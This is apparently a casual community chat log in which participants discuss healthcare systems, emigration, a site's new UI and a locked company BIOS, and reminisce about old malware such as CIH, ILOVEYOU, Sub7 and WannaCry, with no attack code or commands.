Oh man can we not get back in to politics or policies again

indian criminals back to india?

I thought we were done with that 😅

wasnt aware

There are plenty of doctors in the UK, but the government is intentionally trying to ruin the public perception of the NHS so that they can aim to dismantle it without much revolt

yes

jk I'm gonna get a fryup have fun

true, but today I think we have more options than there were a few years back, I am saying do your thing what you like dont sit and grind for FANG interviews, if you are inclined towards their company and are fit they will select you np.

is the new UI something permemant ... or could the developers potentially revert it back to how it was

I have an issue with the new UI @eternal mango ... The code block doesn't seem to work well when you copy and paste. Unlike the old UI which works fine, Other than that, I love the new UI.

It's gonna be permanent

do /feeddback

my company's laptop has a locked BIOS, I cannot install linux on it 😭

sad

is*

Oh I thought it hadn't happened yet

Alright, it IS permanent

^^^^

use /feedback

or open a support ticket

😂

You can try typing in your DevTools console new_ui.reverse() but I cannot guarantee it will work

@muted olive how can one bypass a locked BIOS hypothetically

The ones who study in ivy leagues or the top colleges, or any colleges at all really, will be the ones getting those jobs. Because there may be debates on how useful a degree is etc but it gives you validation which self learning cant. Besides most people who dont go to college dont go because they're not interested so its like... okay, then you dont get the job. Easy. This isnt for people who want to achieve something in life without a degree, but for those who are like "okay, I'll just go play video games in my basement or something after high school" which unfortunately there are a lot of

uhhh

if its a technical bios problem, try removing the battery and re-inserting

DO NOT TRY THAT ON UR COMPANY LAPTOP

if its been intentionally locked, idk

ofc i wont

im not a criminal

https://giphy.com/gifs/dexter-suspicious-aniflicks-21VTFJTEr1x9ortvO3

https://tenor.com/view/doakes-bar-gif-4298875606784040546

The thing is...the US system is still largely profitable despite insurance clampdowns and what not forcing people to go to Mexico and other places for travel medical tourism practices...... but Israel, like the UK and much of the EU, has socialized medicine...so doctors are paid a set amount based on patients per month. My kid's doc complained that he could see us 30x in a month and it still counts as 1 visit as far as the system is concerned...

No way that still works.. last time I was doing that was to clear friends and family computers of the CIH virus 🤣

We had the same idea there 😭

can anyone help with the first flag for synacktiv

#fortresses

excuse me

If you don't try, you don't learn

bro takes me for a criminal hacker

haven't heard that name in a looong time

Michelangelo?

unsolicited freelance pentester

Melissa

😄

yeah idk about israel but that sounds bad, or unprofitable at the least for a medical career there

@muted olive when your income is set by new patients in a month rather than success rate or time spent on patients, you get demotivated fast...especially for things that take repeat visits... Specific to what I mentioned, kid had several viruses going around...and nothing could be done but school required the paperwork proof to return to school...

yes

CIH!

Ahhh.. I do love the old names

Yeah I was just saying some others

methusela

homer

euclid

100%...which is why it's immigrants that fill much of the ranks here of medical staff...and the local folks that are the majority of medical staffers are usually Christian Arabs (and a handful of Muslim ones) who intend to use the time to build a career and then go abroad and go private for big bux

yeah, that sucks :(
opposite problem in some other countries, where you're charged absurd amounts for a single visit or even a call

that rule only applies to residents?

Jerus.. nevermind

most people don't want to go to medical school for 10y to make the same amount per month that they could hawking phones in a cellphone store

Whenever my 30 year old laptop doesnt switch on, this works 🤣

Still got a printout of ILOVEYOU from college somewhere lol

THE Sub7

jfc

https://tenor.com/view/jurassic-world-rebirth-jurassic-world-dinosaur-jurassic-park-t-rex-gif-3228290000372524547

they can go to america and build a career there.. they may not like other immigrants, but they sure like israeli immigrants ;)

@muted olive usually the people willing to do medical school here for that amount of time are the people who are comfortably situated and positioned to be able to leave abroad and get better pay elsewhere.... even the EU jobs are a step up for them.... Like....I've met Christian Arabs that learned French in school because they were in French-run Catholic schools....so..that's money right there

That, but with longer arms

chomp chomp

so they pick up skills, knowledge, rep, and language....and then they go to France and make big money

yup

although

i guess wannacry is basically old now too. nearly a decade

if they are in a position to move abroad, they could get their degree from abroad as well

disadvantages of being a t rex

generally with Israeli expats it's the most motivated people in whatever field who are willing to eat shit for a bit if it pays off....so they do so... it's like 30% tech bros you're prolly thinking of to 70% electrician/plumber/blue collar types that are willing to be poor and build a business independently

That's why they hunted in packs

a fun thing about wannacry was how it would fail to actually do its intended disk encryption on some devices but would still pop up its ransom note window, so sometime syou could just be like "lol ok" and close it and remove it from the machine with no harm

@muted olive having lived both here and US, the reason why it works for most of what we call "Yordim" is they have higher motivation levels than your average American. Most Americans have low motivation and direction in life......

You can thank EdgeArchitect for writing that on the 9th May 2024

would make terrible basketball players for sure 🤣

I think it's just a universal immigrant thing though..same story for Chinese, Indian, and other types that migrate and make a killing there

I remember as a kid, a stupid kid.. as kids are.. I took a floppy in to secondary school to the IT lab. It had a whole selection of viruses from the 90s/80s

Never saw the admin move so quickly

low motivation and direction in life......
yes, and they still want to get a job over immigrants lmao

they all come poor and hungry...willing to eat shit for a few years to buy ownership stakes.... whereas my peers who are still US-side...well..none are doing anything all that wow

....wut?

like if you want a job, work for it and youll get it

instead of complaining

lol

It's true, Wikipedia history reveals who wrote "The Sub7"

if I went back I'd probably do OK just because I've spent over a decade here living a rougher life than I ever did growing up.....I've broken the mental wall about walking on foot, taking public transportation, carrying my own groceries instead of having a car to haul them,etc.

The meme about hard times -> strong men -> good times -> weak men is pretty true

I think you have a different Sub7?

when you eat enough shit you start to realize that you need to fix something...and when you get too comfortable, it's really hard to get motivated

everyones in the second phase

I think so too

Nah, I mean I looked through the same Wikipedia article you're looking at

for the first phase to start, it needs to start from way below

like, from education

etc

hard times

I think it's by design though...I think we wouldn't have this outlook on life if school and media didn't promise promises that weren't theirs to make

if there was no "get a degree and it'll be okay", there'd be no empty feeling after...

maybe its just time to level up in general